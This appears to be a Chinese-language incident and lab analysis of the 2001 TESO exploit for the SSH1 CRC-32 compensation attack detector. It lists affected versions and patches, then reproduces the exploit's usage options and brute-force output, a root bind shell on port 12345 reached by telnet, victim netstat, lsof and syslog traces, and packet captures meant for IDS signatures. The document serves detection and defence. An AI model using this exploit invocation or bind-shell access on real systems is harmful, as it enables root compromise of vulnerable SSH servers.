　　　 http://www.securityfocus.com/cgi-bin/archive.pl?id=75&start=2001-10-27&end=2001-11-02&mid=221998&threads=1

然后更甚的是在vuln-dev@securityfocus.com邮件列表中提示Newsbytes.com中
有新闻描述有人愿付$1000美金的人提供此攻击工具。还有没有确认的传闻针对
Solaris 8/SPARC SSH.com 1.2.26-31 系统的攻击代码也存在。闻名的安全站点
securitynewsportal.com就被这个漏洞攻击，下面地址是被黑截图：

　　　 http://defaced.alldas.de/mirror/2001/10/24/www.securitynewsportal.com/

最近TESO发布了关于这些攻击代码的信息，你可以在下面的地址查看：

　　　 http://www.team-teso.org/sshd_statement.php

下面是受影响的SSH版本：

SSH Communications Security SSH 2.x and 3.x (if SSH Version 1 fallback is enabled)
SSH Communications Security SSH 1.2.23-1.2.31
F-Secure SSH versions prior to 1.3.11-2
OpenSSH versions prior to 2.3.0 (if SSH Version 1 fallback is enabled)
OSSH 1.5.7

不过供给商已经为系统提供补丁信息，大家可以参考如下地址：

　　　 http://www.ssh.com/prodUCts/ssh/advisories/ssh1_crc-32.cfm
　　　 http://openssh.org/security.html
　　　 http://www.cisco.com/warp/public/707/SSH-multiple-pub.html

---------------------------------------------------------------------------

攻击行为的分析
=====================

2001年10月6日，攻击者从Netherlands网络段使用crc32 compensation attack
detector漏洞攻击程序入侵了一台UW网络中使用了OpenSSH 2.1.1的Redhat linux
系统，漏洞描述如CERT VU#945216所述:

　　　 http://www.kb.cert.org/vuls/id/945216

系统中一系列操作系统命令被替换成木马程序以提供以后再次进入并清除了所有
日志系统。第二台SSH服务器运行在39999/tcp高端口，系统入侵后被用来扫描其他
UW以外的网络以获得更多的运行OpenSSH 2.1.1的系统。

通过一些恢复操作对这个漏洞程序进行了分析：

这个攻击代码基于OpenSSH 2.2.0版本(这个是2.1.1之后的版本，对crc32
compensation attack detection function进行了修补)，不过针对OpenSSH
2.1.1进行攻击，其攻击代码也可以使用在ssh.com 1.2.31版本(针对其他SSH
协议1 和版本的测试尚无完成)。

攻击代码对针对如下系统：

　　　 linux/x86 ssh.com 1.2.26-1.2.31 rhl
　　　 linux/x86 openssh 1.2.3 (maybe others)
　　　 linux/x86 openssh 2.2.0p1 (maybe others)
　　　 freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl

虽然这个攻击代码可以对多个平台系统进行攻击，这里攻击者只扫描22/tcp端口，
然后连接这些系统获得响应的版本程序并只对"OpenSSH_2.1.1"继续进一步操作。
这些扫描使用快速SYN扫描，使用来自t0rn root kit中的工具。

对破坏的系统进行分析发现已经有47067个地址被扫描，而在这些地址中，有1244
个主机被鉴别存在此漏洞，攻击者成功的在8月8日系统离线之前利用此漏洞进入
4个主机。

这个攻击者代码对使用访问控制限制(如, SSH.com的"AllowHosts" 或者 "DenyHosts"
设置) 或者包过滤(如, ipchains, iptables, ipf) 的系统不能正常工作，因为这些
会要求交换Public keys。

-------------------------------------------------------------------------

对攻击者代码实时的分析
============================

此攻击代码在隔离的网络段进行测试，使用了网络地址为10.10.10.0/24，攻击
主机使用了10.10.10.10 而有漏洞的服务主机为 10.10.10.3。

有漏洞的服务主机系统运行了在Red Hat Linux6.0(Kernel 2.2.16-3 on an i586)
的SSH.com的 1.2.31 版本。

而攻击主机运行了Fred Cohen's PLAC[1] (从CD-ROM引导的Linux 2.4.5 系统),
文件使用"nc"(Netcat)[2]拷贝到系统中.

攻击一方再现
=========================

当以没有任何参数运行攻击代码的时候会显示使用信息：

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac /bin >> ./ssh

linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from
openssh 2.2.0 src

greets: mray, random, big t, sh1fty, scut, dvorak
ps. this sploit already owned cia.gov :/

**please pick a type**

Usage: ./ssh host [options]
Options:
-p port
-b base Base address to start bruteforcing distance, by default 0x1800,
goes as high as 0x10000
-t type
-d debug mode
-o Add this to delta_min

types:

0: linux/x86 ssh.com 1.2.26-1.2.31 rhl
1: linux/x86 openssh 1.2.3 (maybe others)
2: linux/x86 openssh 2.2.0p1 (maybe others)
3: freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

被测试系统在系统端口2222上运行着SSH.com version 1.2.31 (未修补)程序，并
把syslog日志重定向独立的文件sshdx.log.

这里选择了类型type 0和2222 攻击端口：

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac /bin >> ./ssh 10.10.10.3 -p 2222 -t 0

linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from
openssh 2.2.0 src

greets: mray, random, big t, sh1fty, scut, dvorak
ps. this sploit already owned cia.gov :/

...........................
bruteforced distance: 0x3200
bruteforcing distance from h->partial packet buffer on stack
..............^[[A................|////////\\\\!
bruteforced h->ident buff distance: 5bfbed88

trying retloc_delta: 35
....!
found high Words of possible return address: 808
trying to exploit
....
trying retloc_delta: 37
.!
found high words of possible return address: 805
trying to exploit
....
trying retloc_delta: 39
......
trying retloc_delta: 3b

......
trying retloc_delta: 3d
!
found high words of possible return address: 804
trying to exploit
....
trying retloc_delta: 3f
......
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

这里看来，攻击攻击相似被"停止"了，返回被攻击系统查看却发现被开了后门。

被测试系统一方再现
=======================

在利用漏洞之前，被测试系统显示标准SSH守护程序运行在22/tcp端口，要被
测试的应用程序运行在2222/tcp端口，两个都在监听状态，而且标准SSH守护
程序有一个外部连接(10.10.10.2:33354)，通过netstat查看如下：

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

而在攻击程序"停止"以后，再用netstat查看网络监听状态如下：

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:2222 10.10.10.10:32965 ESTABLISHED
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

发现有新的服务在12345/tcp端口监听。

返回攻击者主机，使用netstat查看网络状态，发现程序使用了暴力猜测地址
方式攻击：

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN
tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED
tcp 0 0 10.10.10.3:2222 10.10.10.10:33075 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33074 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33072 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33071 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33069 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33067 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33066 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33064 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33063 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33062 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33061 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33060 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33059 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33058 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33056 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33055 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33053 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33051 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33050 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33048 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33047 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33046 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33042 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33041 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33040 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33039 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33038 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33036 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33035 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33034 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33033 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33032 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33030 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33029 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33028 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33027 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33024 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33023 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33022 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33021 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33020 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33016 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33014 TIME_WAIT
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

而使用LiSt Open Files ("lsof")[4]工具显示被测试的SSH守护程序开启了一个
新的监听端口：

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# lsof -p 9364
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sshd 9364 root cwd DIR 3,3 1024 2 /
sshd 9364 root rtd DIR 3,3 1024 2 /
sshd 9364 root txt REG 3,3 655038 442413 /usr/local/src/ssh-1.2.31/sbin/sshd1
sshd 9364 root mem REG 3,3 340771 30722 /lib/ld-2.1.3.so
sshd 9364 root mem REG 3,3 370141 31107 /lib/libnsl-2.1.3.so
sshd 9364 root mem REG 3,3 66231 31103 /lib/libcrypt-2.1.3.so
sshd 9364 root mem REG 3,3 47008 31113 /lib/libutil-2.1.3.so
sshd 9364 root mem REG 3,3 4101836 31102 /lib/libc-2.1.3.so
sshd 9364 root mem REG 3,3 246652 31109 /lib/libnss_files-2.1.3.so
sshd 9364 root mem REG 3,3 252234 31111 /lib/libnss_nisplus-2.1.3.so
sshd 9364 root mem REG 3,3 255963 31110 /lib/libnss_nis-2.1.3.so
sshd 9364 root mem REG 3,3 67580 31108 /lib/libnss_dns-2.1.3.so
sshd 9364 root mem REG 3,3 169720 31112 /lib/libresolv-2.1.3.so
sshd 9364 root 0u CHR 1,3 4110 /dev/null
sshd 9364 root 1u CHR 1,3 4110 /dev/null
sshd 9364 root 2u CHR 1,3 4110 /dev/null
sshd 9364 root 3u inet 10202 TCP *:12345 (LISTEN)

sshd 9364 root 4u inet 10197 TCP 10.10.10.3:2222->10.10.10.10:33190 (CLOSE_WAIT)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

很明显，攻击程序成功利用此漏洞获得ROOT SHELL，并绑定了一个高端TCP端口。
这样攻击者可以使用任何"telnet"或者"rc"工具连接到此端口并以超级用户的
方式执行任意命令，如下所示：

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac ~ >> telnet 10.10.10.3 12345
Trying 10.10.10.3...
Connected to 10.10.10.3.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
date;
Thu Nov 1 18:04:42 PST 2001
netstat -an --inet;
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 10.10.10.3:12345 10.10.10.10:33077 ESTABLISHED
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN
tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
exit;
Connection closed by foreign host.
root@plac ~ >>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[注重]：使用telnet要加";"号，而nc连接不需要。

等攻击者退出以后，被测试系统网络状态返回正常：

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

假如syslog日志功能开启了，连接和暴力测试的信息全部会记录下来(注重，这个是
对SSH.com 1.2.31在Red Hat LInux 6.0上的测试 -- 日志标志会和记录OpenSSH
不一样)：

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Nov 1 18:46:14 victim sshd[9510]: log: Connection from 10.10.10.10 port 33298
Nov 1 18:46:19 victim sshd[9511]: log: Connection from 10.10.10.10 port 33299
Nov 1 18:46:22 victim sshd[9512]: log: Connection from 10.10.10.10 port 33300
Nov 1 18:46:26 victim sshd[9513]: log: Connection from 10.10.10.10 port 33301
Nov 1 18:46:31 victim sshd[9515]: log: Connection from 10.10.10.10 port 33302
Nov 1 18:46:35 victim sshd[9516]: log: Connection from 10.10.10.10 port 33303
Nov 1 18:46:39 victim sshd[9517]: log: Connection from 10.10.10.10 port 33304
Nov 1 18:46:43 victim sshd[9518]: log: Connection from 10.10.10.10 port 33305
Nov 1 18:46:47 victim sshd[9518]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:46:47 victim sshd[9519]: log: Connection from 10.10.10.10 port 33306
Nov 1 18:46:52 victim sshd[9519]: fatal: Connection closed by remote host.
Nov 1 18:46:53 victim sshd[9520]: log: Connection from 10.10.10.10 port 33307

Nov 1 18:46:57 victim sshd[9521]: log: Connection from 10.10.10.10 port 33308
Nov 1 18:47:01 victim sshd[9522]: log: Connection from 10.10.10.10 port 33309
Nov 1 18:47:06 victim sshd[9523]: log: Connection from 10.10.10.10 port 33310
Nov 1 18:47:10 victim sshd[9524]: log: Connection from 10.10.10.10 port 33311
Nov 1 18:47:14 victim sshd[9525]: log: Connection from 10.10.10.10 port 33312
Nov 1 18:47:19 victim sshd[9526]: log: Connection from 10.10.10.10 port 33313
Nov 1 18:47:24 victim sshd[9527]: log: Connection from 10.10.10.10 port 33314
Nov 1 18:47:24 victim sshd[9527]: fatal: Connection closed by remote host.
Nov 1 18:47:46 victim sshd[9528]: log: Connection from 10.10.10.10 port 33315
Nov 1 18:47:46 victim sshd[9529]: log: Connection from 10.10.10.10 port 33316
Nov 1 18:47:47 victim sshd[9530]: log: Connection from 10.10.10.10 port 33317
Nov 1 18:47:47 victim sshd[9531]: log: Connection from 10.10.10.10 port 33318
Nov 1 18:47:47 victim sshd[9532]: log: Connection from 10.10.10.10 port 33319
Nov 1 18:47:48 victim sshd[9533]: log: Connection from 10.10.10.10 port 33320
Nov 1 18:47:48 victim sshd[9534]: log: Connection from 10.10.10.10 port 33321
Nov 1 18:47:48 victim sshd[9535]: log: Connection from 10.10.10.10 port 33322
Nov 1 18:47:49 victim sshd[9536]: log: Connection from 10.10.10.10 port 33323
Nov 1 18:47:49 victim sshd[9537]: log: Connection from 10.10.10.10 port 33324
Nov 1 18:47:50 victim sshd[9538]: log: Connection from 10.10.10.10 port 33325
Nov 1 18:47:50 victim sshd[9539]: log: Connection from 10.10.10.10 port 33326
Nov 1 18:47:50 victim sshd[9540]: log: Connection from 10.10.10.10 port 33327
Nov 1 18:47:51 victim sshd[9541]: log: Connection from 10.10.10.10 port 33328
Nov 1 18:47:51 victim sshd[9542]: log: Connection from 10.10.10.10 port 33329
Nov 1 18:47:51 victim sshd[9543]: log: Connection from 10.10.10.10 port 33330
Nov 1 18:47:52 victim sshd[9544]: log: Connection from 10.10.10.10 port 33331
Nov 1 18:47:52 victim sshd[9545]: log: Connection from 10.10.10.10 port 33332
Nov 1 18:47:52 victim sshd[9546]: log: Connection from 10.10.10.10 port 33333
Nov 1 18:47:53 victim sshd[9547]: log: Connection from 10.10.10.10 port 33334
Nov 1 18:47:53 victim sshd[9548]: log: Connection from 10.10.10.10 port 33335
Nov 1 18:47:54 victim sshd[9549]: log: Connection from 10.10.10.10 port 33336
Nov 1 18:47:54 victim sshd[9550]: log: Connection from 10.10.10.10 port 33337
Nov 1 18:47:54 victim sshd[9551]: log: Connection from 10.10.10.10 port 33338
Nov 1 18:47:55 victim sshd[9552]: log: Connection from 10.10.10.10 port 33339
Nov 1 18:47:55 victim sshd[9553]: log: Connection from 10.10.10.10 port 33340
Nov 1 18:47:55 victim sshd[9554]: log: Connection from 10.10.10.10 port 33341
Nov 1 18:47:56 victim sshd[9555]: log: Connection from 10.10.10.10 port 33342
Nov 1 18:47:56 victim sshd[9556]: log: Connection from 10.10.10.10 port 33343

Nov 1 18:47:56 victim sshd[9555]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:47:57 victim sshd[9557]: log: Connection from 10.10.10.10 port 33344
Nov 1 18:47:57 victim sshd[9558]: log: Connection from 10.10.10.10 port 33345
Nov 1 18:47:57 victim sshd[9559]: log: Connection from 10.10.10.10 port 33346
Nov 1 18:47:58 victim sshd[9560]: log: Connection from 10.10.10.10 port 33347
Nov 1 18:47:58 victim sshd[9561]: log: Connection from 10.10.10.10 port 33348
Nov 1 18:47:59 victim sshd[9562]: log: Connection from 10.10.10.10 port 33349
Nov 1 18:47:59 victim sshd[9563]: log: Connection from 10.10.10.10 port 33350
Nov 1 18:47:59 victim sshd[9564]: log: Connection from 10.10.10.10 port 33351
Nov 1 18:48:00 victim sshd[9565]: log: Connection from 10.10.10.10 port 33352
Nov 1 18:48:00 victim sshd[9566]: log: Connection from 10.10.10.10 port 33353
Nov 1 18:48:00 victim sshd[9567]: log: Connection from 10.10.10.10 port 33354
Nov 1 18:48:01 victim sshd[9568]: log: Connection from 10.10.10.10 port 33355
Nov 1 18:48:01 victim sshd[9569]: log: Connection from 10.10.10.10 port 33356
Nov 1 18:48:02 victim sshd[9570]: log: Connection from 10.10.10.10 port 33357
Nov 1 18:48:02 victim sshd[9571]: log: Connection from 10.10.10.10 port 33358
Nov 1 18:48:02 victim sshd[9572]: log: Connection from 10.10.10.10 port 33359
Nov 1 18:48:03 victim sshd[9573]: log: Connection from 10.10.10.10 port 33360
Nov 1 18:48:03 victim sshd[9574]: log: Connection from 10.10.10.10 port 33361
Nov 1 18:48:03 victim sshd[9575]: log: Connection from 10.10.10.10 port 33362
Nov 1 18:48:04 victim sshd[9576]: log: Connection from 10.10.10.10 port 33363
Nov 1 18:48:04 victim sshd[9577]: log: Connection from 10.10.10.10 port 33364
Nov 1 18:48:04 victim sshd[9578]: log: Connection from 10.10.10.10 port 33365
Nov 1 18:48:05 victim sshd[9579]: log: Connection from 10.10.10.10 port 33366
Nov 1 18:48:05 victim sshd[9580]: log: Connection from 10.10.10.10 port 33367
Nov 1 18:48:06 victim sshd[9581]: log: Connection from 10.10.10.10 port 33368
Nov 1 18:48:06 victim sshd[9582]: log: Connection from 10.10.10.10 port 33369
Nov 1 18:48:06 victim sshd[9583]: log: Connection from 10.10.10.10 port 33370
Nov 1 18:48:07 victim sshd[9584]: log: Connection from 10.10.10.10 port 33371
Nov 1 18:48:07 victim sshd[9585]: log: Connection from 10.10.10.10 port 33372
Nov 1 18:48:07 victim sshd[9586]: log: Connection from 10.10.10.10 port 33373
Nov 1 18:48:08 victim sshd[9587]: log: Connection from 10.10.10.10 port 33374
Nov 1 18:48:08 victim sshd[9586]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:08 victim sshd[9588]: log: Connection from 10.10.10.10 port 33375
Nov 1 18:48:08 victim sshd[9587]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:08 victim sshd[9589]: log: Connection from 10.10.10.10 port 33376
Nov 1 18:48:08 victim sshd[9588]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:09 victim sshd[9590]: log: Connection from 10.10.10.10 port 33377
Nov 1 18:48:09 victim sshd[9589]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:09 victim sshd[9591]: log: Connection from 10.10.10.10 port 33378
Nov 1 18:48:09 victim sshd[9590]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:09 victim sshd[9592]: log: Connection from 10.10.10.10 port 33379
Nov 1 18:48:09 victim sshd[9591]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:10 victim sshd[9592]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:10 victim sshd[9593]: log: Connection from 10.10.10.10 port 33380
Nov 1 18:48:10 victim sshd[9594]: log: Connection from 10.10.10.10 port 33381
Nov 1 18:48:10 victim sshd[9593]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:11 victim sshd[9595]: log: Connection from 10.10.10.10 port 33382
Nov 1 18:48:11 victim sshd[9594]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:11 victim sshd[9596]: log: Connection from 10.10.10.10 port 33383
Nov 1 18:48:11 victim sshd[9597]: log: Connection from 10.10.10.10 port 33384
Nov 1 18:48:11 victim sshd[9596]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9598]: log: Connection from 10.10.10.10 port 33385
Nov 1 18:48:12 victim sshd[9597]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9599]: log: Connection from 10.10.10.10 port 33386
Nov 1 18:48:12 victim sshd[9598]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9600]: log: Connection from 10.10.10.10 port 33387
Nov 1 18:48:12 victim sshd[9599]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:13 victim sshd[9601]: log: Connection from 10.10.10.10 port 33388
Nov 1 18:48:13 victim sshd[9602]: log: Connection from 10.10.10.10 port 33389
Nov 1 18:48:13 victim sshd[9603]: log: Connection from 10.10.10.10 port 33390
Nov 1 18:48:14 victim sshd[9604]: log: Connection from 10.10.10.10 port 33391
Nov 1 18:48:14 victim sshd[9605]: log: Connection from 10.10.10.10 port 33392
Nov 1 18:48:15 victim sshd[9606]: log: Connection from 10.10.10.10 port 33393
Nov 1 18:48:15 victim sshd[9605]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:48:15 victim sshd[9607]: log: Connection from 10.10.10.10 port 33394
Nov 1 18:48:16 victim sshd[9608]: log: Connection from 10.10.10.10 port 33395
Nov 1 18:48:16 victim sshd[9609]: log: Connection from 10.10.10.10 port 33396
Nov 1 18:48:16 victim sshd[9610]: log: Connection from 10.10.10.10 port 33397
Nov 1 18:48:17 victim sshd[9611]: log: Connection from 10.10.10.10 port 33398
Nov 1 18:48:17 victim sshd[9611]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:48:17 victim sshd[9612]: log: Connection from 10.10.10.10 port 33399

Nov 1 18:48:18 victim sshd[9613]: log: Connection from 10.10.10.10 port 33400
Nov 1 18:48:18 victim sshd[9614]: log: Connection from 10.10.10.10 port 33401
Nov 1 18:58:18 victim sshd[9614]: fatal: Timeout before authentication.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

注重日志条目的最后一条，假如成功利用此漏洞被入侵，认证过程就会停止，因为
此时SHELLCODE的后门程序已经执行，这样你可以连接端口进行任何操作。唯一的
问题是，SSH守护程序(至少SSH.com 1.2.31)会由于认证过程不完整而超时，导致
关闭开启的SHELL。一般在监听shell的父进程关闭只前会有10分钟时间空域。

网络通信信息分析
=====================

在这里使用了Tcpdump来截获上面的攻击行为，记录信息在sshdx.dump，可以被用
来IDS入侵检测系统获得攻击标志信息。假如你的IDS系统不支持tcpdump文件，你
可以使用"tcpreplay"[12]来转换tcpdump信息。

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# tcpdump -s1500 -w sshdx.dump ip host 10.10.10.3 &
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

这样可以很轻易的查看SSH守护程序产生的多个连接信息，使用"ngrep"[5]工具可以
辨认出最后连接和插入SHELLCODE的暴力破解攻击信息：

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
. . .

T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
SSH-1.5-1.2.31.

T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]
SSH-1.5-OpenSSH_2.2.0p1.

T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
............GA..@.......%....`..P.....D&..2.+7#...1!?..c.r).8.^.h.....
..I..b6..9.f........N..0....:BAh@s.e...H......(.D2.Zg......#.......\.j
W...O$....6.......$...V..;...U.@Y.K2.p<\..o..?..l.........*.p.K<s..,..
.@7.wBBy......1.i..%".....G*g.G.t(......M........[.......J......<.

T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]
............GA..@.....`G.Fg.g.!.i.}..........._.e....=../..6....;....)
T.....|c...#W.\wve.cy .n.....q.Sc....}..".N.G.w"....n.../#.....8x..&.Z
....Q/.......8..

T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
.........4..

T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
..W...2.......2.......2.......2.......2.......2.......2.......2.......
2.......2.......2.......2.......2.......2.......2.......2.......2 ....
..2!......2$......2%......2(......2)......2,......2-......20......21..
....24......25......28......29......2<......2=......2@......2A......2D
......2E......2H......2I......2L......2M......2P......2Q......2T......
2U......2X......2Y......2\......2]......2`......2a......2d......2e....
..2h......2i......2l......2m......2p......2q......2t......2u......2x..
....2y......2|......2}......2.......2.......2.......2.......2.......2.
......2.......2.......2.......2.......2.......2.......2.......2.......
2.......2.......2.......2.......2.......2.......2.......2.......2.....

..2.......2.......2.......2.......2.......2.......2.......2.......2...
....2.......2.......2.......2.......2.......2.......2.......2.......2.
......2.......2.......2.......2.......2.......2.......2.......2.......
2.......2.......2.......2.......2.......2.......2.......2.......2.....
..2.......2.......2.......2.......2.......2.......3.......3.......3...
